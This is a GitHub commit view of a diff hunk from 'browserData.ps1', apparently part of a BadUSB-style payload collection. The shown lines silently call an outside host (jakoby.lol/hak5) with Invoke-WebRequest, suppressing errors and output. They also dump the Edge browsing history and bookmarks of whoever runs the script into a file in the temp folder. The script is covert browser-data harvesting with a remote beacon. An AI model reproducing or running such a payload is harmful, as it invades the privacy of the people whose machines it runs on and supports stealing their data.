Update browserData.ps1

This commit is contained in:
I-Am-Jakoby 2023-06-10 15:29:28 -05:00 committed by GitHub
parent 2575e78c54
commit 29cb80fb06
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -31,7 +31,7 @@ function Get-BrowserData {
}
}
}
iwr "https://jakoby.lol/hak5" -EA 0 >$null
Get-BrowserData -Browser "edge" -DataType "history" >> $env:TMP\--BrowserData.txt
Get-BrowserData -Browser "edge" -DataType "bookmarks" >> $env:TMP\--BrowserData.txt